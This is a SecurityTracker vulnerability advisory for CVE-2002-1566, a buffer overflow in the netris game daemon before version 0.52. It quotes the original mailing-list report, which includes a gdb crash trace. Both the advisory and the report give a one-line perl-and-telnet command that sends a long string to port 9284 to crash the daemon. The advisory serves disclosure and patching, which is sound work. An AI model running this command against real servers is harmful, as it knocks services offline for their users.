SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Game)  >   netris Vendors:   Weaver, Mark H.
netris Game Buffer Overflow Lets Remote Users Crash the Daemon
SecurityTracker Alert ID:  1007544
SecurityTracker URL:  http://securitytracker.com/id/1007544
CVE Reference:   CVE-2002-1566   (Links to External Site)
Date:  Aug 21 2003
Impact:   Denial of service via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): prior to 0.52
Description:   A buffer overflow vulnerability was reported in the netris game. A remote user can cause the game to crash.

It was reported [in September 2002] that when netris is run with the '-w' command line option (i.e., the wait option), a remote user can connect to the target system on TCP port 9284 and send a long string to cause the netris daemon on the target server to crash.

A demonstration exploit command is provided:

perl -e '{print "a"x"1028"}' | telnet localhost 9284

Impact:   A remote user can cause the netris daemon to crash.
Solution:   The vendor has released a fixed version (0.52), available at:

ftp://ftp.netris.org/pub/netris/

Vendor URL:  www.netris.org/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  netris-0.5.



--WIyZ46R2i8wDzkSu
Content-Type: text/plain; charset=iso-8859-2
Content-Disposition: inline
Content-Transfer-Encoding: 8bit            

hi.

i found remote bug in latest version of netris(0.5)..

(apocalypse:~)% gdb netris
GNU gdb 4.18 (FreeBSD)
[..]
(gdb) r -w
Starting program: /usr/local/bin/netris -w
(no debugging symbols found)...(no debugging symbols found)...


***
on second terminal:
(apocalypse:~)% perl -e '{print "a"x"1028"}' | telnet localhost 9284
***

Your opponent is using an old, incompatible version
of Netris.  They should get the latest version.
(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x28138fd5 in getenv () from /usr/lib/libc.so.4


exploit code is still under developing.. ;)

sorry for my terrible english.

best regards,
-- 
* Artur Byszko * \x62\x61\x6a\x6b\x65\x72\x6f *

--WIyZ46R2i8wDzkSu
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (FreeBSD)

iD8DBQE9fCnKQCQI8Fcqp4cRApvQAJ9T1Gmcbxw5x3YEIxSZ5sgC5dwXGQCgh1fH
LXwaDWRPOQ/boJ6WDkYtNJM=
=bTns
-----END PGP SIGNATURE-----

--WIyZ46R2i8wDzkSu--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC